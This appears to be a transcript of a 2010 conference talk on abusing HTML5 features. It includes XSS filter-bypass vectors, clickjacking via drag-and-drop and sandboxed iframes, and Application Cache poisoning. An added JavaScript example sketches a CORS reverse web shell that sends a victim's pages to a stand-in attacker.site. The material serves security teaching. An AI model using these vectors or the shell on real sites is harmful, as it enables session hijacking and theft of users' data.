  1. Attacking with HTML5 (Lavakumar Kuppan, Attack & Defense Labs)

  2. Who am I?
  • Web Security Researcher
  • ½ of Attack and Defense Labs, www.andlabs.org
  • Penetration Tester @ really big bank
  • Author of Imposter & Shell of the Future
  • Likes HTML5
  • @lavakumark
  Disclaimer: Views expressed in this talk are my own and do not necessarily reflect those of my employer.
  Attack & Defense Labs, Black Hat Abu Dhabi 2010

  3. What to Expect?
  • Introduction to HTML5
  • Attacking 'HTML4' websites with HTML5
  • Network Reconnaissance with HTML5
  • HTML5 Botnets
  • Tool Releases:
    – Ravan: JavaScript Distributed Password Cracker
    – JSRecon: HTML5-based JavaScript port/network scanner

  4. Let's talk HTML5

  5. What is HTML5?
  • Next major version of HTML
  • Adds new tags and event handlers to HTML
  • Adds new APIs that can be called from JavaScript
  • Native support for features currently provided by plug-ins like Flash/Silverlight/Java

  6. There is some HTML5 in all of us
  • HTML5 is already here
  • Many features are supported by the latest versions of Firefox, Chrome, Safari and Opera
  • IE is slowly getting there with IE9 Beta
  • Unless you are trying very hard, you most definitely have some HTML5 in you(r machine)

  7. Is HTML5 hopelessly insecure?
  • Short answer: NO
  • Long answer:
    – Security has been a major consideration in the design of the specification
    – But it is incredibly hard to add features to any technology without increasing the possibility of abuse
  This talk is about the abuse of some of HTML5's features.

  8. HTML5 features featured in this talk
  • New Tags and Attributes
  • Cross Origin Requests
  • Drag-n-Drop API
  • Application Cache
  • WebSockets
  • WebWorkers

  9. Cross-site Scripting via HTML5

  10. Black-list XSS filters
  • Filters are a popular way to prevent XSS when output encoding is not an option, i.e. when accepting rich HTML content from users
  • White-list filters like AntiSamy exist for this reason
  • But developers like developing... custom filters
  • Almost all of these filters are black-list based
  • Of course we know that black-list filters fail
  • But 'we' are only about 0.1% of the web community

  11. Bypassing black-list filters with HTML5 - 1
  • Filter blocks tags like '<script', '<img' etc. ☹
  • HTML5 introduces new tags that can execute scripts ☺
  • New tags == bypass of outdated black-lists ☺
  Eg:
  <video onerror="javascript:alert(1)"><source>
  <audio onerror="javascript:alert(1)"><source>
  (Caveat: in current browsers the error event for a failed media source is fired at the <source> element rather than the media element, so the handler is usually placed there: <video><source onerror="alert(1)">. The point of the slide, that a black-list written before these tags existed does not know them, is unchanged.)

  12. Bypassing black-list filters with HTML5 - 2
  • Filter blocks '<' and '>', so tags cannot be injected ☹
  • But user input is being injected inside an element's attribute ☺
  • Filter also blocks event attributes like onerror, onload etc. ☹
  • HTML5 adds new event attributes → filter bypass ☺
  Eg:
  <form id=test onforminput=alert(1)> <input> </form>
  <button form=test onformchange=alert(2)>X
  (Caveat: onforminput and onformchange were later dropped from the HTML5 draft and current browsers do not fire them; the lesson, that a fixed list of handler names goes stale as the platform grows, still holds.)

  13. Bypassing black-list filters with HTML5 - 3
  • Similar to case 2
  • But the filter is blocking event attributes with the regex 'on\w+='
  • This blocks the HTML5 event attributes shown earlier ☹
  • HTML5's 'formaction' attribute can bypass this filter ☺ (it is not an event handler at all, so the regex never matches it; the javascript: URL runs when the victim clicks the button)
  Eg:
  <form id="test" /><button form="test" formaction="javascript:alert(1)">X

  14. Self-triggering XSS exploits with HTML5
  • A common XSS occurrence is injection inside some attribute of INPUT tags
  • Current techniques require user interaction to trigger this XSS (the arrow marks where attacker-controlled input begins):
  <input type="text" value="-->Injecting here" onmouseover="alert('Injected val')">
  • HTML5 turns this into a self-triggering XSS: autofocus gives the element focus on page load and onfocus fires without the user doing anything
  <input type="text" value="-->Injecting here" onfocus="alert('Injected value')" autofocus>

  15. HTML5 Security Cheatsheet
  • Updated list of all HTML5 XSS vectors
  • Maintained by Mario Heiderich
  • All vectors discussed so far are from this list
  Front end: http://heideri.ch/jso/#html5
  Back end: http://code.google.com/p/html5security/
  (The list has since moved to html5sec.org.)

  16. Demo

  17. Reverse Web Shells with COR

  18. Cross Origin Request (COR)
  • Originally, Ajax calls were subject to the Same Origin Policy
  • Site A cannot make XMLHttpRequests to Site B
  • HTML5 (the Cross-Origin Resource Sharing spec, CORS) makes these cross-domain calls possible
  • Site A can now make XMLHttpRequests to Site B, as long as Site B allows it
  • The response from Site B must include the header: Access-Control-Allow-Origin: <origin of Site A> (or *)
  • The check is done by the browser on the response, not on the request: a simple GET or POST still reaches Site B; what the header controls is whether Site A's script may read the reply. Cookies are only attached if the script sets withCredentials and Site B also answers Access-Control-Allow-Credentials: true, in which case the wildcard is not accepted.

  19. Reverse Web Shell
  • This feature can be abused to set up a Reverse Web Shell
  • Say vuln.site is vulnerable to XSS and an attacker injects his payload into the victim's browser
  • This payload can now make cross-domain calls to attacker.site and read the response (attacker.site controls its own headers, so it simply returns Access-Control-Allow-Origin for vuln.site's origin)
  • This sets up a communication channel between the attacker and the victim
  • The attacker can access vuln.site from the victim's browser by using this channel: the payload fetches whatever the attacker asks for with ordinary same-origin requests, which carry the victim's session cookies
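  The following is an added example that is neither code from the talk nor Shell of the Future's own code. It covers slide 18 and slide 19 together: first the decision a browser makes before letting a script from one origin read a CORS response from another, then a minimal reverse web shell of the kind slide 19 describes. The two XMLHttpRequest roles (one to vuln.site, one to attacker.site) are passed in as functions, and the example supplies in-memory stand-ins for the attacker's server and for vuln.site's pages so that it runs without a network; the origin names come from the slides, everything else (function names, page contents, the /poll path) is constructed for the example.

```javascript
// Added example, not code from the talk or from Shell of the Future.

// Part 1 (slide 18): what the browser checks before it lets a script running
// in requestOrigin read a cross-origin response. responseHeaders is a plain
// object keyed by lower-cased header name.
function corsAllowsRead(requestOrigin, withCredentials, responseHeaders) {
  const acao = responseHeaders['access-control-allow-origin'];
  if (acao === undefined) return false;
  if (withCredentials) {
    // Credentialed requests may not use the wildcard and need the extra header.
    return acao === requestOrigin &&
      responseHeaders['access-control-allow-credentials'] === 'true';
  }
  return acao === '*' || acao === requestOrigin;
}

// Part 2 (slide 19): the payload injected into vuln.site. It polls
// attacker.site for a path, fetches that path same-origin (so the victim's
// cookies go along, HttpOnly or not) and posts the body back.
//   sameOriginGet(path) -> body           stands in for an XHR to vuln.site
//   crossOriginExchange(path, body) -> {headers, body}
//                                        stands in for an XHR to attacker.site;
//                                        the browser's CORS check is applied
//                                        to its response before it is read
function makeReverseShell({ victimOrigin, sameOriginGet, crossOriginExchange }) {
  function step(result) {
    const reply = crossOriginExchange('/poll', result);
    if (!corsAllowsRead(victimOrigin, false, reply.headers)) {
      throw new Error('attacker.site did not permit ' + victimOrigin + ' to read the response');
    }
    return reply.body; // next path to fetch on vuln.site, or null when idle
  }
  return function run(maxSteps) {
    const fetched = [];
    let next = step(null);
    while (next !== null && fetched.length < maxSteps) {
      const body = sameOriginGet(next);
      fetched.push(next);
      next = step({ path: next, body });
    }
    return fetched;
  };
}

// Constructed stand-in for the attacker's server: a queue of paths it wants
// fetched, and the bodies it gets back. allowOrigin is the value it puts in
// Access-Control-Allow-Origin.
function attackerServer(allowOrigin, queue) {
  const received = [];
  return {
    received,
    exchange(path, body) {
      if (body !== null) received.push(body);
      return {
        headers: { 'access-control-allow-origin': allowOrigin },
        body: queue.length ? queue.shift() : null,
      };
    },
  };
}

// One full run against constructed vuln.site pages.
function demo(allowOrigin) {
  const vulnPages = { '/account': 'balance=1234', '/profile': 'email=victim@example.test' };
  const server = attackerServer(allowOrigin, ['/account', '/profile']);
  const run = makeReverseShell({
    victimOrigin: 'http://vuln.site',
    sameOriginGet: path => vulnPages[path],
    crossOriginExchange: server.exchange,
  });
  return { fetched: run(10), received: server.received };
}

console.log(JSON.stringify(demo('http://vuln.site'), null, 2));
```

  Run as-is, attacker.site answers with Access-Control-Allow-Origin: http://vuln.site and the two pages end up in `received`. Change the argument of `demo` to any other origin and the first poll throws, which is the Same Origin Policy doing its job: nothing in the browser stops the request, it only refuses to hand the reply to the script. Note that the shell never sees a cookie value at all, which is why HttpOnly and IP-to-session binding do not help against it.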

  20. HTML5 Advantage
  • This attack was possible even without HTML5
  • Tools like XSS Shell and XSS Proxy implemented it
  • But they relied on hacks for cross-domain communication
  • This made them less reliable, with poor performance
  • HTML5, with native support for cross-domain communication, takes this attack to a whole other level

  21. Shell of the Future
  • Tool to automate the process of creating and accessing a Reverse Web Shell
  • Tunnels the attacker's HTTP traffic over COR from the victim's browser
  • The attacker can browse the victim's session from his own browser
  • Gets around session hijacking countermeasures like HttpOnly and IP address-to-session ID binding, because the attacker never needs the cookie value: every request is issued by the victim's own browser from the victim's own IP address
  • Comes loaded with two default JavaScript exploits
  • Supports HTTPS websites as well

  22. Shell of the Future's Architecture (diagram not reproduced)

  23. Demo

  24. Clickjacking with HTML5

  25. Text-field injection using the Drag and Drop API
  • Filling forms across domains is usually difficult in Clickjacking attacks
  • HTML5's Drag and Drop API makes this easy
  • The attacker convinces the victim to perform a drag-and-drop operation; a simple game can be convincing here
  • By using frame overlays, this action can fill forms across domains
  • Introduced by Paul Stone at Black Hat Europe 2010

  26. How it works
  • Attacker.site would contain an element like this:
  <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil data')"><h3>DRAG ME!!</h3></div>
  • When the victim starts dragging this, the event's data value is set to 'Evil data'
  • The victim drops the element onto a text field inside an invisible iframe
  • That field is populated with the value 'Evil data'

  27. IFRAME Sandboxing
  • HTML5 adds the sandbox attribute to the IFRAME tag
  • Can be used to disable JavaScript in the iframe
  • Many websites rely solely on frame busting for Clickjacking protection
  • If such a site is included inside a sandboxed iframe, its frame-busting script never runs
  <iframe src="http://www.victim.site" sandbox></iframe>
  • Caveat for defenders: JavaScript frame busting cannot survive a sandboxed frame, but the X-Frame-Options response header (DENY or SAMEORIGIN) is enforced by the browser itself and is unaffected by the sandbox attribute. Note also that a bare sandbox value blocks form submission inside the frame, so an attacker who needs the framed form to submit has to use sandbox="allow-forms".

  28. Demo

  29. HTML5 Cache Poisoning

  30. Poisoning the HTML5 Application Cache
  • The Application Cache has a longer life than the regular cache
  • In Firefox it must be deleted explicitly, but Firefox asks for user approval before a site can set this cache
  • Chrome and Safari do not ask for user approval, but deleting the regular cache also deletes this cache
  • With the regular cache, refreshing the page would update it; the Application Cache still serves the poisoned content until the cache manifest itself changes on the server
  • Imposter has a module to poison the Application Cache
  • Caveat: the attack needs a man-in-the-middle position (the kind Imposter provides, e.g. on an open Wi-Fi network) to serve the poisoned page and its manifest over plain HTTP, and the Application Cache API has since been deprecated and removed from current browsers in favour of Service Workers

  31. Demo
